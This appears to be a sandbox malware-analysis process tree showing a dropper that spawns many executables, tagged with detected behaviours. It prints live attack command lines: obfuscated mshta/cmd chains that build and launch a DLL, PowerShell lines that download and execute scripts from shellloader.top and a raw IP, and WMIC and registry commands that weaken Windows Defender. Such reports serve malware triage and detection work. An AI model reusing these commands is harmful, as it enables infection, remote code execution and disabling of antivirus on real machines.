C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1240 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4308 /prefetch:811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5224 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4480 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4536 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=3412 /prefetch:811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4148 /prefetch:811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6332 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5048 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3872 /prefetch:811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5368 /prefetch:811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5152 /prefetch:811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7468 /prefetch:811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7696 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4416 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1792 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6488 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6644 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6924 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7964 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6264 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7080 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:111⤵
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\8363683.scr"C:\Users\Admin\AppData\Roaming\8363683.scr" /S8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\7195126.scr"C:\Users\Admin\AppData\Roaming\7195126.scr" /S8⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\2990560.scr"C:\Users\Admin\AppData\Roaming\2990560.scr" /S8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\1237098.scr"C:\Users\Admin\AppData\Roaming\1237098.scr" /S8⤵
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5272 -s 6088⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"9⤵
-
C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0, trUE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6&cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "13⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\control.execontrol ..\kZ_AmsXL.6G13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G14⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G15⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G16⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f /Im "sfx_123_206.exe"10⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-PGSLQ.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-PGSLQ.tmp\setup_2.tmp" /SL5="$102B6,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-C2LB9.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-C2LB9.tmp\setup_2.tmp" /SL5="$30206,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-I5ALB.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-I5ALB.tmp\postback.exe" ss111⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss112⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.top/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.top/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"14⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Local\Temp\ezACXYv8D.exe"C:\Users\Admin\AppData\Local\Temp\ezACXYv8D.exe"13⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SYSTEM32\cmd.execmd /c "helimlim.bat"14⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w h -enc IAAkAGEAPQBpAHcAcgAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA2ADEALgAxADMANwAuADEANwAyAC8AeQByAGQALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABBAHIAcwBpAG4AZwAgAHwAaQBlAHgA15⤵
-
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\start.vbs16⤵
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\pli-game.exe"C:\Users\Admin\AppData\Local\Temp\pli-game.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15228d911b9d5c.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS043E7880\Wed15228d911b9d5c.exeWed15228d911b9d5c.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\yHaC2ZecLg_YxWmdH3aFDDbT.exe"C:\Users\Admin\Documents\yHaC2ZecLg_YxWmdH3aFDDbT.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\11GsBx4kbdaiHKOIt2xUM142.exe"C:\Users\Admin\Documents\11GsBx4kbdaiHKOIt2xUM142.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS14E5.tmp\Install.exe.\Install.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS2E69.tmp\Install.exe.\Install.exe /S /site_id "394347"8⤵
- Checks BIOS information in registry
- Enumerates connected drives
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &9⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True11⤵
- Blocklisted process makes network request
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵
-
